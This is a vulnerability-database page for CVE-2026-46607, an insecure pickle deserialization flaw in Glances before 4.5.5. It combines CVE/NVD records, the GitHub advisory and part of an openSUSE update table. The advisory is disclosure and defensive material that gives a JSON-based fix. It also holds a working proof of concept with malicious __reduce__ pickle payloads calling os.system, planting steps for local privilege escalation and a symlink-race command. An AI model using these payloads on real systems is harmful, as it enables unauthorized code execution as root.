CVE-2026-46607 (GCVE-0-2026-46607)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:04 – Updated: 2026-06-25 18:49 – CWE-502 – Deserialization of Untrusted Data
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag/v4.5.5 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46607",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:49:13.379353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:49:32.136Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:04:25.780Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-9837-48hr-q32j",
"discovery": "UNKNOWN"
},
"title": "Glances: Insecure Pickle Deserialization in Version Cache Leads to Arbitrary Code Execution"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46607",
"datePublished": "2026-06-25T18:04:25.780Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-25T18:49:32.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46607",
"date": "2026-06-26",
"epss": "0.00303",
"percentile": "0.21906"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46607\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:49:13.379353Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:48:55.642Z\"}}], \"cna\": {\"title\": \"Glances: Insecure Pickle Deserialization in Version Cache Leads to Arbitrary Code Execution\", \"source\": {\"advisory\": \"GHSA-9837-48hr-q32j\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. 
Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \\u2014 through any of several realistic local or container-level scenarios \\u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:04:25.780Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46607\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:49:32.136Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:04:25.780Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46607
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58

| Vendor | Product | Version |
|---|---|---|
| nicolargo | glances | < 4.5.5 |
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46607",
"lastModified": "2026-06-25T19:58:30.847",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46607",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:49:13.379353Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.527",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-9837-48HR-Q32J
Vulnerability from github – Published: 2026-06-22 21:21 – Updated: 2026-06-22 21:21

Summary
glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).
Details
Affected file: glances/outdated.py, method Outdated._load_cache(), line 121
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121
# outdated.py (_load_cache, line 119-127)
try:
    with open(self.cache_file, 'rb') as f:
        # Code-execution sink: pickle invokes arbitrary callables while
        # loading (see the __reduce__ payloads below), so whoever can write
        # self.cache_file runs code as this process. Nothing in this excerpt
        # verifies the file's contents, its owner, or that the path is not a
        # symlink before the read.
        cached_data = pickle.load(f) # ← no integrity check
except Exception as e:
    # Failure is only logged at debug level. A planted payload has already
    # executed by the time any error about its unexpected return value
    # (the advisory reports a later TypeError) shows up; the remainder of
    # _load_cache is not shown in this excerpt.
    logger.debug(f"Cannot read version from cache file: {self.cache_file} ({e})")
...
self.cache_file is constructed from the XDG cache directory path at Outdated.__init__():
# outdated.py (__init__)
# Predictable per-user location (XDG cache dir, e.g. ~/.cache/glances).
# This excerpt shows no check that the directory is owned by the current
# user, is not group/world-writable, or is not a symlink before it is used;
# those are the gaps the attack scenarios below rely on — confirm against
# the full file.
self.cache_file = os.path.join(
    user_cache_dir('glances')[0],
    'glances-version.db'
)
On a default Linux installation this resolves to /home/john/.cache/glances/glances-version.db (or /root/.cache/glances/… when Glances runs as root).
Python's pickle module is an execution-capable serialisation format: a pickle stream can name any importable callable together with an argument tuple (this is what a class's __reduce__ emits), and pickle.load() invokes it unconditionally while reconstructing the object — none of the attacker's own classes need to be present on the victim. Restricting Unpickler.find_class narrows the set of reachable callables but is not a supported security boundary; the only robust mitigation is to not use pickle for data another principal can write, as the suggested fix below does.
The code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with os.system() via __reduce__ executed the injected shell command successfully before the surrounding Python code raised a TypeError.
PoC
Special configuration required
No non-default Glances configuration is needed. Version checking is enabled by default (check_update = true). The only precondition is that the attacker can write to the Glances user's XDG cache directory (or, for scenario C, to its parent ~/.cache before the subdirectory exists) — see the attack scenarios below for how this arises in practice.
Attack scenario A — local privilege escalation (shared multi-user host)
Prerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user's ~/.cache/glances/ directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).
Step 1 — Identify the cache path
# Prints the cache directory Glances reads. The result depends on the
# environment (HOME / XDG_CACHE_HOME) of the user running this, so run it
# as, or with the environment of, the target Glances user.
# NOTE(review): the __init__ excerpt above calls user_cache_dir('glances');
# confirm the no-argument form resolves to the same path.
python3 -c "from glances.config import user_cache_dir; print(user_cache_dir()[0])"
# Example output: /root/.cache/glances
Step 2 — Craft and plant a malicious pickle
import pickle, os, pathlib

class MaliciousPayload:
    # pickle calls __reduce__ when serialising; the (callable, args) tuple it
    # returns is what lands in the file, and pickle.load() on the victim side
    # invokes that callable. Because the tuple references os.system, the
    # victim never needs this class to be importable.
    def __reduce__(self):
        # This command runs as the Glances process user
        cmd = 'id >> /tmp/glances_rce_proof.txt'
        return (os.system, (cmd,))

# Writing here is the attack precondition (scenarios A-C), not something the
# payload grants: this step must already be possible for the attacker.
cache_dir = pathlib.Path('/root/.cache/glances') # adjust to target
cache_file = cache_dir / 'glances-version.db'
cache_dir.mkdir(parents=True, exist_ok=True)
# os.system's int return value becomes the "unpickled" object, which is why
# the advisory observes a TypeError after the command has run.
cache_file.write_bytes(pickle.dumps(MaliciousPayload()))
print(f'Payload written to {cache_file}')
Step 3 — Wait for Glances to start (or restart it)
Glances calls _load_cache() automatically at startup when check_update = true (the compiled-in default). No special configuration is required by the attacker.
Step 4 — Verify execution
cat /tmp/glances_rce_proof.txt
# uid=0(root) gid=0(root) groups=0(root) ← output from the Glances-user context
Attack scenario B — container / shared-volume poisoning
A compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.
Attack scenario C — symlink race (TOCTOU)
Before the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to ~/.cache/ can create a symlink:
# Precondition for scenario C: ~/.cache is (or can be made) writable by the
# attacker before Glances creates its own subdirectory.
mkdir -p /home/john/.cache
# Per the advisory, Glances then writes its cache file through this link, so
# the file lands in a directory the attacker owns and can swap out later.
ln -s /tmp/attacker_controlled /home/john/.cache/glances
When Glances writes its legitimate cache file it writes instead to /tmp/attacker_controlled/glances-version.db, which the attacker can replace with the malicious pickle before the next start.
Minimal self-contained reproduction
import sys, os, pickle, pathlib, argparse

sys.path.insert(0, '/path/to/glances') # adjust to local clone

# NOTE(review): both /tmp paths below live in a world-writable directory; on
# a shared host another user could pre-create or symlink them. For a clean
# run use a private directory (e.g. tempfile.mkdtemp()) instead.
FAKE_CACHE = pathlib.Path('/tmp/glances_test_cache')
CACHE_FILE = FAKE_CACHE / 'glances-version.db'
FAKE_CACHE.mkdir(parents=True, exist_ok=True)

class Exploit:
    # Serialised as (os.system, (cmd,)); the victim's pickle.load() invokes it.
    def __reduce__(self):
        return (os.system, ('echo RCE_confirmed >> /tmp/glances_rce.txt',))

CACHE_FILE.write_bytes(pickle.dumps(Exploit()))

# Reproduce the exact Glances code path
from glances.outdated import Outdated
# object.__new__ skips Outdated.__init__ (which, per the excerpt above, sets
# cache_file); only the attributes _load_cache is presumed to read are set
# here — confirm against the target version.
obj = object.__new__(Outdated)
obj.args = argparse.Namespace(disable_check_update=False, time=2)
obj.data = {}
obj.cache_file = str(CACHE_FILE)

try:
    obj._load_cache() # pickle.load() fires here
except Exception:
    # os.system returns an int, so code that indexes the "cache" dict fails —
    # after the command has already run.
    pass # expected: int not subscriptable

# os.system blocks until the shell exits, so this sleep is only belt-and-braces.
import time; time.sleep(0.2)
print(pathlib.Path('/tmp/glances_rce.txt').read_text())
# Prints: RCE_confirmed
Impact
Vulnerability type: Insecure Deserialization (CWE-502)
Who is impacted: Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user's XDG cache directory, or in any containerised deployment using shared volumes.
Impact: - Confidentiality: Full — the attacker gains code execution in the context of the Glances process and can read any data accessible to that user. - Integrity: Full — arbitrary commands can modify files, install persistence mechanisms, or alter system state. - Availability: Full — the Glances process and, if running as root, the system can be disrupted.
On many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.
Suggested Fix
Replace pickle with json for the version cache. The data stored is a simple Python dictionary containing two string values and a datetime object; a JSON representation is straightforward:
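import json
import os
import stat
from datetime import datetime

# Keys the cache may contain; on load anything else is rejected so a planted
# file cannot smuggle extra state into the process.
_CACHE_KEYS = ('installed_version', 'latest_version', 'refresh_date')
# O_NOFOLLOW is POSIX-only; on platforms without it the open is ordinary.
_NOFOLLOW = getattr(os, 'O_NOFOLLOW', 0)


def save_cache(cache_file, installed_version, latest):
    """Write the version-check cache as JSON (drop-in for the pickle.dump path).

    In Outdated this corresponds to self.cache_file and self.installed_version().
    The cache directory is created with mode 0700 when it does not exist yet
    (existing directories are left as-is), and the file is opened O_NOFOLLOW
    with mode 0600, so a symlink planted at the cache path (scenario C) is not
    followed and other local users cannot read or swap the file.

    Raises OSError if the path is a symlink (POSIX) or the directory/file
    cannot be created.
    """
    os.makedirs(os.path.dirname(cache_file) or '.', mode=0o700, exist_ok=True)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | _NOFOLLOW
    fd = os.open(cache_file, flags, 0o600)
    with os.fdopen(fd, 'w', encoding='utf-8') as f:
        json.dump({
            'installed_version': installed_version,
            'latest_version': latest,
            'refresh_date': datetime.now().isoformat(),
        }, f)


def load_cache(cache_file):
    """Read the cache back with shape validation (drop-in for pickle.load).

    json.load cannot execute code, but in the reported scenarios the file is
    still attacker-writable, so it is treated as untrusted input. Returns {}
    (the same as "no cache") when the file is missing, a symlink (POSIX), not
    a regular file, not valid UTF-8 JSON, not a dict with exactly the expected
    string-valued keys, or has an unparsable refresh_date. Otherwise returns
    the dict with 'refresh_date' converted to a datetime.
    """
    try:
        fd = os.open(cache_file, os.O_RDONLY | _NOFOLLOW)
    except OSError:
        return {}
    try:
        with os.fdopen(fd, 'r', encoding='utf-8') as f:
            if not stat.S_ISREG(os.fstat(fd).st_mode):
                return {}
            cached_data = json.load(f)
    except (OSError, ValueError):
        # ValueError covers json.JSONDecodeError and UnicodeDecodeError.
        return {}
    if not isinstance(cached_data, dict) or set(cached_data) != set(_CACHE_KEYS):
        return {}
    if not all(isinstance(cached_data[key], str) for key in _CACHE_KEYS):
        return {}
    try:
        cached_data['refresh_date'] = datetime.fromisoformat(cached_data['refresh_date'])
    except ValueError:
        return {}
    return cached_data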
If pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600). Note that this only helps while the attacker cannot also write the key file: if the write access from the scenarios above (an over-permissive home directory, a shared volume) extends to wherever the key lives, the key can be replaced and the check bypassed — another reason to prefer the JSON format.
As an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time, create the cache file itself with mode 0600, and open it with O_NOFOLLOW (or otherwise refuse symlinks) so a link pre-planted at the path (scenario C) is not followed.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46607"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:21:07Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`glances/outdated.py` uses `pickle.load()` to read a version-check cache file stored at a predictable, world-accessible path (`~/.cache/glances/glances-version.db` or `$XDG_CACHE_HOME/glances/glances-version.db`). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).\n\n---\n\n### Details\n\n**Affected file:** `glances/outdated.py`, method `Outdated._load_cache()`, line 121\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121\n\n```python\n# outdated.py (_load_cache, line 119-127)\ntry:\n with open(self.cache_file, \u0027rb\u0027) as f:\n cached_data = pickle.load(f) # \u2190 no integrity check\nexcept Exception as e:\n logger.debug(f\"Cannot read version from cache file: {self.cache_file} ({e})\")\n ...\n```\n\n`self.cache_file` is constructed from the XDG cache directory path at `Outdated.__init__()`:\n\n```python\n# outdated.py (__init__)\nself.cache_file = os.path.join(\n user_cache_dir(\u0027glances\u0027)[0],\n \u0027glances-version.db\u0027\n)\n```\n\nOn a default Linux installation this resolves to `/home/john/.cache/glances/glances-version.db` (or `/root/.cache/glances/\u2026` when Glances runs as root).\n\nPython\u0027s `pickle` module is an execution-capable serialisation format: any class that implements `__reduce__` can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at `pickle.load()` time. 
There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.\n\nThe code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with `os.system()` via `__reduce__` executed the injected shell command successfully before the surrounding Python code raised a `TypeError`.\n\n---\n\n### PoC\n\n**Special configuration required**\n\nNo non-default Glances configuration is needed. Version checking is enabled by default (`check_update = true`). The only pre condition is that the attacker can write to the Glances user\u0027s XDG cache directory \u2014 see the attack scenarios below for how this arises in practice.\n\n---\n\n**Attack scenario A \u2014 local privilege escalation (shared multi-user host)**\n\nPrerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user\u0027s `~/.cache/glances/` directory (e.g. 
the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).\n\n**Step 1 \u2014 Identify the cache path**\n\n```bash\npython3 -c \"from glances.config import user_cache_dir; print(user_cache_dir()[0])\"\n# Example output: /root/.cache/glances\n```\n\n**Step 2 \u2014 Craft and plant a malicious pickle**\n\n```python\nimport pickle, os, pathlib\n\nclass MaliciousPayload:\n def __reduce__(self):\n # This command runs as the Glances process user\n cmd = \u0027id \u003e\u003e /tmp/glances_rce_proof.txt\u0027\n return (os.system, (cmd,))\n\ncache_dir = pathlib.Path(\u0027/root/.cache/glances\u0027) # adjust to target\ncache_file = cache_dir / \u0027glances-version.db\u0027\ncache_dir.mkdir(parents=True, exist_ok=True)\ncache_file.write_bytes(pickle.dumps(MaliciousPayload()))\nprint(f\u0027Payload written to {cache_file}\u0027)\n```\n\n**Step 3 \u2014 Wait for Glances to start (or restart it)**\n\nGlances calls `_load_cache()` automatically at startup when `check_update = true` (the compiled-in default). No special configuration is required by the attacker.\n\n**Step 4 \u2014 Verify execution**\n\n```bash\ncat /tmp/glances_rce_proof.txt\n# uid=0(root) gid=0(root) groups=0(root) \u2190 output from the Glances-user context\n```\n\n---\n\n**Attack scenario B \u2014 container / shared-volume poisoning**\n\nA compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.\n\n---\n\n**Attack scenario C \u2014 symlink race (TOCTOU)**\n\nBefore the Glances cache directory is created for the first time (e.g. 
on a fresh installation), an attacker with write access to `~/.cache/` can create a symlink:\n\n```bash\nmkdir -p /home/john/.cache\nln -s /tmp/attacker_controlled /home/john/.cache/glances\n```\n\nWhen Glances writes its legitimate cache file it writes instead to `/tmp/attacker_controlled/glances-version.db`, which the attacker can replace with the malicious pickle before the next start.\n\n---\n\n**Minimal self-contained reproduction**\n\n```python\nimport sys, os, pickle, pathlib, argparse\n\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\n\nFAKE_CACHE = pathlib.Path(\u0027/tmp/glances_test_cache\u0027)\nCACHE_FILE = FAKE_CACHE / \u0027glances-version.db\u0027\nFAKE_CACHE.mkdir(parents=True, exist_ok=True)\n\nclass Exploit:\n def __reduce__(self):\n return (os.system, (\u0027echo RCE_confirmed \u003e\u003e /tmp/glances_rce.txt\u0027,))\n\nCACHE_FILE.write_bytes(pickle.dumps(Exploit()))\n\n# Reproduce the exact Glances code path\nfrom glances.outdated import Outdated\nobj = object.__new__(Outdated)\nobj.args = argparse.Namespace(disable_check_update=False, time=2)\nobj.data = {}\nobj.cache_file = str(CACHE_FILE)\n\ntry:\n obj._load_cache() # pickle.load() fires here\nexcept Exception:\n pass # expected: int not subscriptable\n\nimport time; time.sleep(0.2)\nprint(pathlib.Path(\u0027/tmp/glances_rce.txt\u0027).read_text())\n# Prints: RCE_confirmed\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insecure Deserialization (CWE-502)\n\n**Who is impacted:** Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user\u0027s XDG cache directory, or in any containerised deployment using shared volumes.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 the attacker gains code execution in the context of the Glances process and can read any data accessible to that user.\n- **Integrity:** Full \u2014 arbitrary commands can modify files, 
install persistence mechanisms, or alter system state.\n- **Availability:** Full \u2014 the Glances process and, if running as root, the system can be disrupted.\n\nOn many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.\n\n---\n\n### Suggested Fix\n\nReplace `pickle` with `json` for the version cache. The data stored is a simple Python dictionary containing two string values and a `datetime` object; a JSON representation is straightforward:\n\n```python\nimport json\nfrom datetime import datetime\n\n# Saving\nwith open(self.cache_file, \u0027w\u0027, encoding=\u0027utf-8\u0027) as f:\n json.dump({\n \u0027installed_version\u0027: self.installed_version(),\n \u0027latest_version\u0027: latest,\n \u0027refresh_date\u0027: datetime.now().isoformat(),\n }, f)\n\n# Loading\nwith open(self.cache_file, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n cached_data = json.load(f)\n cached_data[\u0027refresh_date\u0027] = datetime.fromisoformat(cached_data[\u0027refresh_date\u0027])\n```\n\nIf pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).\n\nAs an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-9837-48hr-q32j",
"modified": "2026-06-22T21:21:07Z",
"published": "2026-06-22T21:21:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
